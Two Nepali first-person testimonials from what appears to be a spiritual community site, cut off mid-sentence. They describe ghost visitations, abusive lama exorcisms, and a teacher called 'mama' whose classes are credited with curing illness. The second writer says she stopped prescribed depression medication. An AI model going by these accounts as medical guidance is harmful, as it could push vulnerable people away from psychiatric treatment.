२०७४/०३/०३ गते शनिबारको दिन मैले मेरै ब्रम्हज्ञानि साथि जुन २०७४/०२/२५ को दिनमा उसको मृत्यु भएको थियो र उसलाई मैले ब्रम्ह भन्ने ठाउँ छ जो मरेपछि त्यहाँ गएर बिलाउनु पर्छ भन्ने थाहा भएर उसलाई मैले ब्रम्ह पुर्याको थिए र उसलाई ब्रम्ह पुराएपछी म घर गएर सुत्ने बेलामा राती मलाई उसको रुप लिएर प्रेतहरु आयो मेरो कोठाको झ्यालबाट हात आएर मलाई छुन खोज्यो मैले काली माता शिवजी हनुमानजी सम्पुर्ण ब्रम्हज्ञानि भगवान मामा माइजू संग गुहार मागे त्यो दिन मलाई सुत्न गाह्रो भैराखेको थियो र फेरि भोलि पल्ट पनि मलाई राती फेरि त्यस्तै भयो मेरो रूममा मरेको मन्छेहरु पितृहरु र प्रेत हरु सबै देख्न थाले मेरो घरमा त कसैले ढोका खोलेको आवाज आउने कसैले ढकढक गरेको आवज आउने त कसैले बत्तिको स्वीच अनअफ गरेको आवज आउने त कोई मेरै बेडमा म संग सुत्ने भैराखेको थियो र म सुत्न कोशिस गरे सुत्ने बेलामा मलाई बिन्दवासनी मन्दिरको अाँगन देखे र मलाई एउटा कविता आयो र मैले कबिता मार्फत शिवजि संग भनेँ।

सदाशिव जाने हो म पनि कहिले पालो आउँछ भनी।
कहिले पालो आउँछ भनी काटेको टिकट गयो पनि।।
आज आउल भोलि आउला कुर्दै बाटो हेर्दै बसि।
लैजानु हुन्छ कि भन्दै आश गर्दै पनि ।
हजुरको काम गर्नु पर्ने के के हो शिवजी भनि।
अझै पुगेन भने भन्नू शिवजि अहिले पनि ।
भनेर शिवजी संग भने अनि त्यसपछि मलाई शिवजी ले भन्नू भयो।

तिमिले मेरो काम त गरेकै थियौ।
सदशिव जानलाई पक्का भईछौ।।
झिल्केले ले ईशारा पाए तिमिलाई गराउछ अनुभव।
त्यही अनुभवले सदाशिव पुग्ने हो नाअती बस।।
सबैजना पुगिसके मन नदुखाई बस।
सदाशिव जाने पालो तिम्रो भएको छ अब।
धन्यवाद शिवजी हजुरलाई ।
सदाशिवको अनुभव गराईदिनु मलाई।।

भनेर भन्नू भयो अनि मैले सुत्ने बेलामा सदाशिव जानलाई के ले छेकेको रहेछ भनेर मनमा लिएको थिए र एक्कासी झप्प भए तर मलाई प्रेतहरुले मरेको मान्छेहरुले र पितृहरुले सुत्न नै दिएन मैले कति काटे भिरबाट गुल्टाए औला ठर्याएर गलि गर्दा मेरो औला आफै निहुरिने सुतिराखेको ठाउँमा आएर झापड हान्न आउने मैले शिवजी कालीमाता हनुमानजी संग गुहार मागे सुत्न कोशिस गरे सुत्न नै सकेन मेरो शरीर फुलेर पसिनैपसिना भयो रातिको २.३० बजे सम्म मैले भगवानहरु संग गुहार मागे कत्ती भएन मैले औला ठर्याएर मामालाई भन्दिन्छु भन्दा अटोमेटिक मेरो औला नुग्ने अनि अति गाह्रो भएपछि मेरो मनमा मामालाई भन्नू पर्छ भन्ने आयो र मामा लाई भनेपछी मात्र समस्याको समाधान हुन्छ भन्ने आयो अनि मैले मामालाई मेसेन्जरमा म्यासेज गरे मामालाई मेसेन्जरमा भनेँ मामा सुत्नु भएकाे रहेनछ तुरून्तै जवाफ दिनु भयाे । मामा ले जवाफ दिने बित्तिक्कै मलाई हिम्मत बढयो र मामा संग कुराकानी भयो ।

जया:- मलाई अस्ति सुस्मालाई ब्रम्ह पठाए पछि फेरि पनि अस्ति जस्तै सुत्न सकेन अस्ति राती हिजो राती पनि अनि रातभर प्रेतहरु मरेको मान्छेहरु पितृहरु रुममा घरभित्र कहिले ढोका खोलेको आवाज आउने कहिले केही गरेको आवज आउने अनि मलाई पहिलाको बिरामी हुदाँको याद आउने भएको छ मामा भने ।

मामा:- मैले के गरम त ? भनेर भन्नू भयो ।

जया:- मैले भगवान संग पनि गुहार मागे मामा सार्है गह्रौ भएर हुँदै नभएर हजुर संग भनेपछी जान्छ भन्ने आएर भनेको मामा भने ।

मामा:- मलाई भनेपछी जान्छरे ? अनि के गर्ने ? भन्नू भयो।

जया:- मलाई मनमा त्यस्तो आयो र हजुर संग भनेको अहिले पनि मेरो लोबेडमा बसिराखेको छ मरेको मान्छे भनेँ डर लाग्ने भएको छ मलाई यस्तो त पहिला भएको थियो फेरि आज भएको छ भनेँ ।

मामा:- जया तिमी डाक्टर बन्ने बेला भयो अझै यस्तो ? भन्नु भयाे । र सिकाउन थाल्नु भयाे । ल नडराउ पहिला मैले पढाएको सम्झ अब देखि कसैसँग डराउदिन भन बजरंगवलि लाई सम्झ र उहालाई सोधेर म निडर हुन्छु भन। बाहिर जान नडराउ,मैले कालिमाताको बर्णन
गरेर सराङकोटबाट हाम्फालेको थिएँ भनेर सम्झ, सबैको घाँटी काट भन्नू भयो । अफिसको, चिनेको पितृको घाँटि काट र बगाईदेउ भन्नू भयो । घाँटि काट भन्नू भयो ।

जया:- हस् मामा भनेँ ।

मामा:- मन नदुखाउ निडर बन नडराई बहिर निस्क औला ठड्याउदै ढोका बाहिर हेर नडराउ शितल हुन्छ । माताहरु सम्झ अनि कोठा मा आउ भन्नू भयो।

जया:- हस् मामा भनेँ अनि मैले भने मामा मैले के सोचेको थिए भने आजभोलि क्लासमा पहिला पहिला म अस्वस्थ थिए अहिले बल्ल अलि ध्यान भएको छ क्लासमा नयाँ आएकोहरुको अनुभव सुन्दा मलाई मेरो पहिला यस्तै भएको थियो बल्ल बुझ्ने मौका पाए राम्रो संग बुझ्छु पनि भन्ने आएको थियो अस्ति बाट भने अनि मलाई म बिरामी हुदाँ को दिन सम्झदा अाँखामा आँसु आएको थियो।

मामा:- ए होला हामिले त तिम्रो देखेर बुझेको हो तिमिले अरुको देखेर बुझ्ने हो भन्नू भयो ।
अनि मामाले मैले भनेको गर भन्नू भयो ।

जया:- हस् मामा धन्यवाद भनेँ ।

मामा:- मामाले सोध्नु भयो अहिले कस्तो छ भनेर ?

जया:- अहिले हल्का भयो मामा छाती पोलेको छ डर चाहिँ हरायो भनेँ।

मामा:- तिमी जस्तो भाग्यमानी कोई छैन र तिमिले जस्तो असाध्य पनि कसैले गर्दैन भन्नू भयो।

जया:- मैले औला ठड्याएर गाली गर्दा त मेरो औला नुग्ने आफै सार्है गह्रौ भएर हजुर संग भनेकाे मामा भनेँ।

मामा:- ल अहिले हातमा खुकुरी लिएको सम्झेर बाहिर निस्क मनबाट नै काट्दै निस्क हावा खाउ अनि आएर सुत भन्नू भयो ।

जया:- अनि मलाई सुस्मा लाई ब्रम्ह पठाउदा मलाई मनमा उसको कुराहरु सुनेर कताकता डर जस्तो भएको थियो । म पनि एस्तै हुने होला प्रेतले लग्ने होला भनेर सोचेको थिएँ र मामा संग भने मामा मैले सुस्माको ब्रम्ह पठाउदा उसले गरेको अनुभवले पनि मलाई मरेपछी हजुर संग आएर माग्दिन डाईरेक्ट शिवजी संग भन्न सक्ने हुनुपर्दो रहेछ नत्र दु:ख पाउदो रहेछ भन्ने आएको थियो भनेँ ।

मामा:- हो भन्नू भयो र कस्तो छ अहिले भन्नू भयो ।

जया:- रातिको २.४५ बजे बहिर जाम जाम भयो भनेँ ।

मामा:- मैले भनेको कुरा काट्नु हुदैन भनेर भन्नू भयो।

त्यसपछि म बहिर गएँ एकछीन बसेँ मलाई हल्का हुँदै गयो मामा संग कुराकानी गरेपछी । अनि भित्र आएँ मलाई फेरि पनि पितृ पछि लागिनै रहयो मैले त्यो पितृ लाई खुकुरीले हानेर घाँटी छिनालेँ, टाउको एकातिर शरीर एकातिर भयो, मैले त्यो दृश्य आज सम्म देखेको थिएन कि टाउको एकातिर छटपटाएको शरीर अर्कोतिर छट्पटाएको अनि मैले हनुमानजीलाई जिम्मा लगाएर सुतेपछि म सजिलै संग सुतेँ र मेरो उपचार मामा ले मेसेन्जर बाट यसरी गर्नुभयो।
सदाशिव कि जय
सम्पुर्ण ब्रम्हज्ञानि भगवान कि जय।।
धन्यवाद मामा माइजू लाई र सम्पुर्ण ब्रम्हज्ञानि साथिहरु लाई।।

]]>
https://www.sadashivacommunity.com/2017/07/14/%e0%a4%ae%e0%a5%87%e0%a4%b0%e0%a4%be%e0%a5%87-%e0%a4%85%e0%a4%a8%e0%a5%81%e0%a4%ad%e0%a4%b5-%e0%a4%b0-%e0%a4%b8%e0%a4%ae%e0%a4%be%e0%a4%a7%e0%a4%be%e0%a4%a8/feed/ 0
मेराे राेग र उपचारकाे यात्रा https://www.sadashivacommunity.com/2017/07/14/%e0%a4%ae%e0%a5%87%e0%a4%b0%e0%a4%be%e0%a5%87-%e0%a4%b0%e0%a4%be%e0%a5%87%e0%a4%97-%e0%a4%b0-%e0%a4%89%e0%a4%aa%e0%a4%9a%e0%a4%be%e0%a4%b0%e0%a4%95%e0%a4%be%e0%a5%87-%e0%a4%af%e0%a4%be%e0%a4%a4/ https://www.sadashivacommunity.com/2017/07/14/%e0%a4%ae%e0%a5%87%e0%a4%b0%e0%a4%be%e0%a5%87-%e0%a4%b0%e0%a4%be%e0%a5%87%e0%a4%97-%e0%a4%b0-%e0%a4%89%e0%a4%aa%e0%a4%9a%e0%a4%be%e0%a4%b0%e0%a4%95%e0%a4%be%e0%a5%87-%e0%a4%af%e0%a4%be%e0%a4%a4/#respond Thu, 13 Jul 2017 18:35:16 +0000 https://www.sadashivacommunity.com/?p=337 Continue reading "मेराे राेग र उपचारकाे यात्रा"]]> By Krishna Shrestha (Chitwan, Padampur)

भाग एक परिचय

मेराे नाम कृष्णमाया श्रेष्ठ हाे । मेराे घर साैराहा चाेक, पदमपुर हाे । मेराे माइत स्याङ्जा बजार, स्याङ्गजा हाे ।म जन्मेकाे तिन दिनमा मेराे टाउकाेमा सएपले बेरेका थियाे रे भनेर अामाले र सबै भन्थे । मेराे घरमा सर्पहरूपनि अाइराख्थे र सर्पलाइ सुनपानीले छरे पछि तिनिहरूजान्थे । म सानाे छँदापनि बिरामी भइ राख्थेँ । मलाइ याद छ मेराे बुबा र अामाले मलार्इ सधै काँधमा लिएर रातभरी बाेकेर डुलाउनु हुन्थ्याे । ८ –९ बर्षकाे उमेर छँदा मैले भनेकाे जस्ताे गर्न पाएँ भने मलाइ सन्चाे हुन्थ्याे । मैले भनेकाे जस्ताे भएन भने मलाइ बिरामी हुन्थ्याे, टाउकाे दुख्ने, वाक्ने एलर्जीहुने हुन्थ्याे ।

त्यसपछि हाम्राे गुफा राखिखियाे । गुफाबाट बाहिर निस्कने दिन थियाे, बिहान ३ बजे उठेर नुहाएँ, त्यसपछि कुनै अदृश्यले तर्साएकाे थियाे । भुत जस्तै केहि जस्तै देखेकाे थिएँ त्यसबेला त्यस पछि म फत्याक्क फत्याक परेर मुटु दुखेकाे थियाे । अनि लामा ल्याएछन् । म बाहिर निस्कन नहुने, मलाइ भित्र राखे लामाले बाहिरबाट फुमक्याे, पानी फुकेर खान दियाे । अनि मलाइ सन्चाे भएकाे थियाे ।

२०४९ सालमा असार १५ गते देखी स्कुल बिदा थियाे । म त्यती खेर १५ बर्षकाे थिएँ हाेला । त्यतिबेला मलार्इ ज्वरअाउने हुन्थ्याे ।त्याे ज्वर १०३ देखी १०७ डिग्री सम्म पुग्थ्याे । त्यसाे हुँदा पाेखरामा डा. कुमार समशेर कहाँ त्याएका थिए । त्यसबेला मलाइ टाइफाइटभएकाे थियाे भनेर भनेका थिए । र अाैषधी ३ महािना सम्म १००० एमजीकाे अाैषधी खाँदापनि ज्वर घटेन । ज्वरमा म बर्बराउथेँ । म अाफुलाइ बाँच्चु जस्ताे लाग्दैनथ्याे । तिन महिना बिरामीहुँदा मेराे हड्डी छालामात्र बाँकी थियाे । मै डा. कुमार समशेर कहाँ पटक पटक लैजादा पनि हब घरै लैजाउ भन्नु हुनथ्याे याे बाहेक अरू अाैषधीले छैन भन्ु हुन्थ्याे । खाना खान सक्दैनथेँ ।र मलार् चम्चामा पानि खुलाउथे तिन महिना सम्म ।  त्घयस बिरामी भएकाे बेलामा घरमा मलाइ बाबुअामा, दाजुभाइ ले कुरेर बस्थे कसनकी मलाइ भुतहरू लिन अाउथे । मैले ति भुतहरूलाइ देख्थे तर त्यहा उपस्थित अरू मानिसहरूले ति भुतहरूलाइ देख्दैनथे । यसरी बिरामी भइरहेकाे र मलाइ भुतहरूले लसन अाउछने भनेर भन्ने गरपछि दाइ बुबाले लामा बाेलाएछन् ।  लामालाइ अछयता देखाउन थाले । म बस्न नसकेर दाइ भाइले समातेर अडाएर राखेका थिए । लामाले दिउसाे ४बजे देखी सुरूगरेकाे थियाे । चरसकाे थालमा एक अाङ्राखाेरा पानीराखेर अाङ्खाेरा त्यस थालमा घाेप्ट्याएर त्यस अाङ्खाेरामा चारतिर बत्तिबालेकाे थियाे । पानि उम्लान थाले पछि बाेक्सी लागेकाे रहेछ भन्न थाले त्याे लामाले । त्यस लामाले याे बाेक्सी कडा रहेछ भनेर अर्काे लामालाइ पनि काेलाएर ल्याएकाे थियाे ।  राती नाै बजे तिर म मा बाेक्सी बाेल्न थाल्याे । बाेक्सी बाेल्दा मेराे माइजु भएर बाेल्न अाएकाे थियाे । बाेल्ने क्रममा हिजाे खान्छु भनेकाे खान सकिन भाेली जसरीभए पनि बहुरूपी लगाएरू भएपनि खान्छु भनेर भनेकाे थियाे । पहिला लामाले फकाउदै थियाे पछि बाेक्सी ले बाेल्न नमाने पछि पिट्न थाथ्याे , म बाेक्सी भएर तिनिहरू सँग लड्न थालेँ । ए क छिन अगाडीसक्क मलाइ अरूले समातेर धानेका थिए मैले बाेक्िप बनेर ति सबै सँगलड्दै थिएँ । म लाइ धान्न पर्दैनथ्याे, त्यहाँ वर पर भइका ले सबैले मलाइ पिट्न थाले । सबैले पिटे । पनियाे तताएर राताे बनाएर गालामा हान्छु भनेकाे थियाे । अरूले हानेकाे थियाे भन्छन् मैले भने हानेकाे देखेकाे थिइन । अरू कुराकानीहरू अलि अलि याद हून्थयाे तर अाफुले अाफ्नाे शरीर चलाउन सकेकाे छैन अरूले अाफ्नाे शरीर चलाइराखेकाे छ भन्ने लागिरहेकाे थियाे । अागाेमा खुर्सानी डडाएर सुध्न लगायाे ।पछि त्यस बाेक्सीलाइ याे बच्चालाइ छाेडभनेर बाचा कबल गराउन थाले । त्यस पछि त्यस बाेक्सी भन्नेले छाेड्छु छाेड्छु भन्याे । लामाले बाती माेटाेेबनाएर बत्ति बालेरमुख अाँ गर्न लगाएर खान लगायाे ।  मैले त्याे बलिरहेकाे बत्ती खाएँ । मलाइ लामा काे पैताला चाट्न लगायाे । त्याे बाेक्सी भएर मैले लामाकाे पैताला चाटेँ मलाइ पनि याे याद छ । दुइटै लामाकाे खुट्टामा ढाेग गर्न लगायाे ।  लामाले खुकुरी ल्याएर त्यसमा पुजा गरेर त्यस बाेक्सीलाइ अबदेखी कहिल्यै अाउदिन भनेर कसम खान लगायाे ।

त्यसकाे भाेलि पल्टबाट अलि निकाे हुन थाल्याे । केही दिन पछि झन् ठिक भयाे र फेरी पाेखरामा डा. कुमार समशेरकहाँ देखाउन ल्याउदा उहाँ हरूपनि कसरी बाच्याे भनेर दङ्ग पर्नु भएकाे थियाे र मलाइ जाँचेर तिमिलाइ केही राग छैन अबदेखी जे खाएपनि हुन्छ भन्न्ु भयाे । त्यस देखी अाजसम्म ज्वराे अाएकाे छैन ।

त्यसकाे एक बर्ष जती पछि मलाइ टाउकाे दुख्न थाल्याे । कुनै अाैषधीले पनि काम गरेन । अनि मेराे भिनाजुले काठमाण्डाैमा नसा तथा मानसिक राेग सम्बन्धित डा. उपेन्द्र देवकाेटाकहाँ लिएर जानुभयाे । डा. उप्रन्द्र देवकाेटा ले migraine हाे भनेर त्यसकाे अाैषधी दिनुभयाे । चार बर्ष जती migraineकाे अाैषधी खाएँ। टाउकाे दुख्ने कहिले कम हुन्थ्याे कहिले दुख्थ्याे । migraine अाैषधी खान छाेडेँ बरू टाउकाे दुखेकाे बेलामा अरू टाउकाे दुखेकाे अाैषधीहरू  Nimes, Aspro, Cetamole, Desprine खाने गरेँ । यी अाैषधीहरू खाने छाेड्ने गर्ने गरेकाे थिएँ । यसाे गर्दै २–३ बर्ष बितेछ ।

म २०५१ साल तिर १७ –१८ बर्षकाे भएकाे थिएँ म अाखा चिम्म गरेर बर्बराउने गर्न थालेँ । म बाेक्सी बाेलेकाे हाे , मेराे नाम ठेगाना याे हाे भनेर कुनै चिनजान इष्टमित्रकाे नाम गरेर बाेल्थेँ । हाेसमा अाउदा सुरूमा केही याद हुन्थेन पछि केही समय पछि कसैले यस्ताे यस्ताे गरेकाे थियाे भन्याे भने अलि अलि याद अाउथ्याे । जस्तै म हाेसमा अाउदा मेराे अगाडी चुराेटका ठुटाहरू, अण्डाका बाेक्राहरू, चिया खाएका गिलासहरू हुन्थे र मेराे मुखबाट चुराेट खाएकाे गन्ध अाइरहेकाे हुन्थ्याे । सबै मलाइ देखेर खिल्लिगरेर हास्थे अनस मलाइ पनि अालि अलि याद अाउथ्याे । म बाेक्सी भएर बाेलेकाे बेलामा मेराे नातेदार चिनेकाे अाएथ्याे । मेराे बाउलाइ नाम काटेर पुननारान भनेर बाेलाउथ्याे रे, मेराे दाइलाइ काले भनेर बाेलाउथ्याे रे, मेराे भाउजुलाइ दुलही भनेर बाेलाउथ्याे रे। नेवारीमा बुहारीलाइ दुलही भनेर बाेलाउने चलन छ । बुहारीलाइ दुलही दुधमात्रै हालेर चिया पकाइदे, चुराेट ५५५ त्यसबेलाकाे सबैभन्दा महङ्गाे चुराेट ल्याइदे, अण्डा उसिन्दे भनेर दुइ तिनवटा अण्डा खान्थ्याे रे, चुराेट दुइतिन खिल्ली, दुइ तिन कम चिया खान्थ्याे रे । मेराे भाउजुलाइ तँ बुहारी हाेस् भनेर ढाेग गर्न लगाउथ्याे रे र मेराे भाउजुले अमाजु भनेर ढाेग गर्नु हुनथ्याे रेर । मेराे दाइलाइ भाइ भनेर माया गरेर अङ्गालाे मारेर अनि बिदा हून्थ्याे र मलाइ सन्चाे हुन्थ्याे ।त्यस पछि मलाइ केहि पनि नभएकाे जस्ताे हुन्थ्याे घरकाे पसलकाे सबै काम जिम्मेवारी लेन देन सबै मैले गर्थेँ कुनै हिसाब फरक पर्दैनथ्याे ।

मलाइ यस्ताे पटक पटक हुन थाल्याे । लामाहरूकहाँ जाने नया नया उपाएहरू लामाहरूले गर्थे। उमालेकाे पानी खन्यादिए, अागाेकाे अाडमा राखेर काेदाेकाे पिठाे हाले पाेल्ने गरेका थिए । मैले राम्राे कपडा लगाए त्याे बाेक्सी अाइ हाल्थ्याे, घरमा केहि प्रगती भएकी बाेक्सी अाइ हाल्थ्याे । त्यसर्ले मैले नयाँ कपडा लगाउथिन, नया जुत्ता लगाउथिन। घरमा कुखुरा पालेर भाले बास्ने भएपछि त्याे बाेक्सी अाएर त्याे भाले काटेर  चडा भन्न अाउथ्याे । घरका मान्छेले पनि मानिदिन्थेर र लामा बाेलाएर लामा ले भने अनुसार कुखुरा काट्ने, कुभिण्डाे काट्ने गरिदिन्थे ।

त्यसपछि मेराे बिहे भयाे । माइतमा हुँदा मैलै पुजाहरू गर्नु पर्थ्याे। माइतहुँदा  घरका सबै पुजाहरू जिम्मा मेराे थियाे थियाे त्यसैले पुजाअाजा,ब्रत निकै गर्ने गरेकाे थिएँ । एक दिन ब्रतबस्दा बेहाेस भएकाे थिएँ । मेराे बिहेभएकाे घुमा पुजा हरू सासु ससराहरूलेनै पुजा गर्ने गर्थे त्यसैले मैले गर्नु पर्दैनथयाे । मलाइ कुनै कष्टहरूपनि थिएनन् ।

सासु बित्नुभयाे । घरकाे पुजागर्ने जिममेवारी ममा अायाे । मेलै फेरी पुजा गर्ने, ब्रत बस्ने गर्न थालेँ मेराे टाउकाे दुख्ने सुरूभयाे । अाखामा अाँसु अाउने हुन थाथ्याे । काठ माण्डाै अाेम नर्सिङ्गहाेम का डाक्टर P.P. Sharma ले Depression हाे भनेर निदाउने अाैषधी दिनुभयाे र मैले खान थालेँ । अाैषधी खाएर निदाएकाे निदाएै भइ राख्ने गरेकाे काे ले अाैषधी खान छाेठेर पाेखरामा लामाकाे मा गएँ । लामाले काेदाेकाे पिठाेले पाेल्नेर जन्तर लगाए पछि सन्चाे भयाे टाउकाे दुख्न र अाँखाबाट अाँसु अाउन छाेड्याे  र डाक्टरकाे अाैषधी खान छाेडेँ ।

अलि अलि असन्चाे भए जस्ताे भइ राख्ने भएर पितृ हेराउन गएँ । त्यहाँ हेरायने मान्छेमा पितृ सासु अाएर बाेल्नुभयाे म तरेकाे छैन मलाइ एकाहा लगाइदे भन्नु भयाे । त्यस बेला म सँग पैसा थिएन र सासुलाइ गाली गर्दै जीउदाे हुँदा पनि दुख्ख दियाे मरे पछि पनि दुःख दिने भनेर भनेकाे त्यसाेभए तिन बर्ष पछि गरिदेउ भनेकाे थियाे ।

मेराे घर बनाउन पर्याे भनि दुन निकाल्नकाे लागी हेराउन गएँ । ब्रमह्मणले जन्म कुण्डली हेर्ने बित्तिकै म नाग भइ राेएँ र घर परिवारलाइ गाली गरेँ ।मलाइ नाग अाएछ र म नाग भएर घिस्रेर हिड्न थालिछु ।  त्यहि हेराउने कहाँ घिस्रेर हिड्दै कुर्चि भित्र पसेकाे थिए । त्यहाँ श्रीमान र म गएकाे थिएम् । ब्राह्मणले देउता अाएकाे भन्याे र जाै तिल सुन पानी छरि दियाे। म बिउझिएँ । ब्राह्मणले मलाइ चाेखा खाउ, चाेखाे भएर बस भन्नु भयाे। गुरू पुर्णिमाकाे दिनमा गुरूमान्न अाउ भन्नु भयाे । त्यस पछि प ञ्चमी पञ्चमीमा नाग भइ हिड्न थालेँ । म नाग भएर घिस्रेर हिड्द रहिछु र घिस्रेर अाँगनमा पुग्द रहेछु । म सर्प जस्तै घिस्रेर हिड्ने , म दुध खान अाएकाे भन्ने गर्दि रहिछु । दुध पनि भैसीकाे नहुने गाक्षकाे चाहिने हुन्थ्याे रे । घर छिमेकीले मलाइ देउता अाउनु भयाे भनेर दुध बाल्टी बाल्टिमा लिएर अाउने गर्थे ।र मैले ति दुध हरू ३–४ लिटर पिउथेँ अरू दुधमा पाैडीखेल्थेँ रे । त्यसबेला अरूका मनका कुराहरू भि दिन्थेँ रे । छाेराले भिडियाेमा खिचसकाे हुन्थ्याे । म अगाएँ सबैकाे कुरा नी भनि दिएँ अब म जान्छु मलाइ बिदा देउ  भने पछि सबैले जाै तिल पानी ले छर्केर सालकाे धुप बाले पछि मलाइ छाेड्थ्याे र म हाेसमा अाउथेँ । पछि म अाफनाे भिडियाे हेरेर छक्क पर्थेँ मलाइ याे याद हुँदैनथ्याे छिमेकहरू याे याे साउनीलाइ किन यस्ताे भएकाे हामिलाइ भइदिएनी हुन्थ्याे भन्थे कसै कसैले।

मत्यसरी सर्प भएर पञ्चमी पञ्चमीमा बर्षाै सम्म हिडेँ । मैले भविष्यवाणी गरिदिन्थेँ, अरू अाइमाइ नछुने भएकाे मैले थाहा पाउथेँ । अरूले छाेउकाे खान हुदैनथ्याे , घरबाट निस्केर जान नहुने, निस्कने बित्तिकै हल्लने काम्ने हुन थालेँ । अरूले छाेए पकाएकाे खान हुदैनथ्याे । यता कार्यले म थाकिसकेकाे थिएँ उपाय केहि थिएनन् । काठमाण्डाै बाट, स्याङ्गजाबाट ठुला ठुला ब्राक्मणहरू ल्याएर पुजा गर्दा पनि केहि लागेन । अन्य विभिन्न उपाएहरू गरे पनि केहि नभए पछि डाक्टर काेमा गएँ । डाक्टरले Depression भनेर अाैषधी खान थालेँ । नाग हुन छाेडेँ । तर अाैषधी खान थाले पछि झन् निन्द्रा लाग्न छाड्याे । अाैषधी बढाउन थालेँ । सुत्ने बेलामा अाखाँ अगाडी नागले हेरेकाे जस्ताे हुन्थ्याे। झन् डरले सुत्न सक्दिनथेँ ।

मेराे भाइ अनिल र बुहारी दीपाले पाेखरामा एक जना डाक्टर अाउनु भएकाे छ । उहाले यस्ता राेगहरूलाइ  उपचार गर्नु हुन्छ जाम भनेकाे भएर म डाक्टर कहाँ जान थालेँ ।

भाग दुइ मेराे उपचार

माघ २५ गते २०७३ सालमा पाेखरामा अाएँ ।

म याे ब्रह्मज्ञानकाे क्लासमा अाउनु अगाडीमेराे छाेरा कुशल श्रेष्ठ अाएकाे थियाे । छाेराले ब्रह्मज्ञान बुझेर छाेरामा अाएकाे परिवर्तनले म खुशी भएकाे थिएँ । सुरूमा त मेराे भाइ अनिलले त्यस ब्रह्मज्ञानमा अाएर पाएकाे ज्ञानले अनिलकाे स्वास्थ र जीवनमा अाएकाे परिवर्तनले म  प्रभावित भएकाे थिएँ । मेराे भाइ अनिल लन्डन बस्ने गर्दथ्याे। अाफ्नाेकाे राेगकाे उपचार त्यहाँ हुन नसके पछि उपचारकाे क्रममा नेपाल अाएकाे र नेपालमा र इन्डियामा गरेर बर्षाै सम्म विभिन्न डाक्टर, धार्मिक गुरूहरू सँग उपचार गराउदै भाैतारिरहेकाे थियाे । तर उसलाइ त्यहा ब्रह्मज्ञानकाे डाक्तरकहाँ गए पछि सन्चाे हुन थालेकाे र भाइकाे जीवनमा अाएकाे परिवर्तनले हामी सब परिवार खुसि थियाैँ ।

म धेरै बर्षदेखि बिरामी भएकाे र सँधै डिप्रेसनका निदाउने अाैषधी दुइ तिन ट्याब्लेट खाए पछि मात्र मलाइ राती निन्द्रा लाग्थ्याे । दिन भरी झाेक्राइरहन्थेँ । त्यसाे भए पछि घरका कामहरूपनि बेलामा पुरागर्न सकिन हाेला त्यसैले मेराे घरमा तनाब थियाे । मलाइ सबैले हेला गर्थे । घर छाेडेर माइती जान्थेँ । माइतीले फेरी घर फर्काइ दिन्थे । यस्ताे करिब ५–७ पटक भयाे । अामाले इज्जत जान्छ भनेर घर फिर्ता पठाइदिनु हुन्थ्याे । बरू तलाइ अावस्यक खर्च गर्ने पैसा दिउला घरै जा भन्नु हुन्थ्याे र मेरा अावश्यक खर्च अामाले पुर्याउनु हुन्थ्याे। मेराे अाैषधी उपचारमा पनि घरबाट सहयाेग हुदैनथ्याे । अाज सम्म ५०० रूपिया मेराे उपचारकाे लागी भनेर माग्दा पनि मेराे लाेग्नेले मलाइ दिएकाे छैन । यस्ताे जीवन काटिराखेकाे थिएँ ।

म क्लासमा अाउन थालेँ । सुरूमा केहि बुझिन । मेराे भन्दा अरूकाे पनि मेराे जस्तै समस्याहरू भएकाहरू अाएका रहेछन् उपचार गर्न र धेरै जनाकाे उपचार भइसकेकाे उदाहरणहरू देखेर मेराे पनि उपचारहुन्छकि भनेर अाशा जाग्याे । उपचारकाे विधि फरक थियाे। क्लासमा डाक्टरसाबले साेध्नु हुन्थ्याे सिकाउनु हुन्थ्याे। मलाइ अस्वथ तेस्राे नेत्रकाे राेग लागेकाे हाे र धेरै दिन लाग्न सक्छ । यहा पटक पटक अाउन सक्छाै धेरै महिना सम्म अाउन सक्छाै पुरा सन्चाे नहुन्जेल सम्म अाउन सक्छाै भने अाउ नत्र नअाउ अाजै फिर्ता जाउ भन्नु भयाे । मैलै बाच्ने अाशा ले हुन्छ म यहि बस्छु पाेखरामा भाइकाे घरमा भनेर भने । म यसरि उपचारकाे लागि पाेखरामा बसेकाे देखेर घरबाट दबाब अाइरह्याे घर अाइज भनेर । घर फाेहाेर भयाे, घरमा पकाएर खान दिनेहरू काेहि छैनन् , छा्ररा बिग्रयाे भन्ने कुराहरू हुन्थे मेराे उपचार कस्ताे भएकाे भनेर परिवारले कहिल्यै साेधेनन् । अाैषधी उपचारमा पैसा लाग्छ रे दिनुहुन्छ भन्दा लाेग्नेले म सँग पैसा छैन भन्नु भयाे ।

क्लासमा अरूकाे अनुभव हेर्ने माैका मिल्याे । अस्वस्थ तेस्राे नेत्र भएका हरूलाइ देवीदेवताहरू, भुत प्रेतहरू, पितृहरू प्रवेश गरेर दुःख दिन्छन् भनेर थाहा भयाे । डाक्टर साब लाइ धेरै जसाेले मामा भन्दा रहेछन् मैले पनि मामा भन्न थालेँ । उहाँले अाफुले लेखेकाे किताब दिनु भयाे, त्यस बिताबका बारेमा हरेक दिन बुझाउनु भयाे त्यसाे गर्दै जाँदा मैले देख्ने गरेकाे सुन्ने गरेकाे अावाजहरूकाे अर्थ लगाइ दिनु भयाे। मलाइ अलि ठिक हुन थालेँ । डिप्रेसनकाे अाैषधी खान छाेडेँ । अाैषधी नखाएपनि निन्द्रा लाग्ने हुन थाल्याे। मेराे शरीरमा अाएर पितृहरू नागहरू बाेले । उहाँले ति सबै लाइ चिन्ने र तर्कने उपायहरू बताइदिनुभयाे ।

यसरि दिनहरू बित्दै गए मैले मेराे तेस्राे नेत्र स्वस्थ भएर ब्रह्मका ज्ञानभएका देवीदेवताहरूलाइ देख्न थालेँ उहाँ हरूसँग प्रत्यक्ष देख्न बाेल्न अर्थ लगाउन सिक्दै गएँ । म सँग ति भुत प्रेत, नाग, पितृहरू टाढा टाढाहुँदै गए र ब्रह्मज्ञानी देवीदेवताहरू नजिक हुँदै गएकाे अनुभव गर्न थालेँ । म  बिन्ध्यबासिनी मन्दिरमा जाँदा माताहरू, गणेशजी, हनुमानजीहरू अाएर बाेल्न थाल्नुभयाे, मलाइ ब्रह्मज्ञान सिकाउन थाल्नु भयाे । मलाइ हुःख दिने भुत, प्रेत,पितृृ,नामहरूलाइहरू लाइ टाढा धपाइदिनु भयाे । मलाइ पनि  तिनीहरूलाइ टाढा धपाउन  सिकाएदिनुभयाे । हरेक दिन शिवजी अाएर मलाइ लेख्न पढ्न सिकाउन थाल्नुभयाे । हरेक दिन गर्दै मैले लेख्न पढ्न सिक्न थालेँ । मैले लेखहरूलेख्ने, कविताहरूलेख्ने, गीतहरूलेखेर क्लासमा सुनाएँ । मेरा ति राेगका 